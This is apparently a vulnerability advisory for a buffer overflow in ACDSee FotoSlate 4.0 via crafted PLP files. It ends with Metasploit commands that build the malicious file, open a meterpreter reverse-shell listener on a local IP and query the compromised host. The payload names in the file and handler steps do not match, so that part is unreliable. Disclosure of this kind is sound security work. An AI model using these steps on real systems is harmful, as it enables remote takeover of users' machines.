Vulnerability discovered by Parvez Anwar
Public release of the vulnerability the 2011-09-12
Metasploit PoC provided the 2011-10-10
PoC provided by :
Affected version(s) :
ACDSee FotoSlate 4.0 Build 146 is vulnerable, other versions may also be affected.
Tested on Windows XP SP3 with :
ACDSee FotoSlate 4.0 Build 146
This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.
use exploit/windows/fileformat/acdsee_fotoslate_string set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp exploit -j getuid sysinfo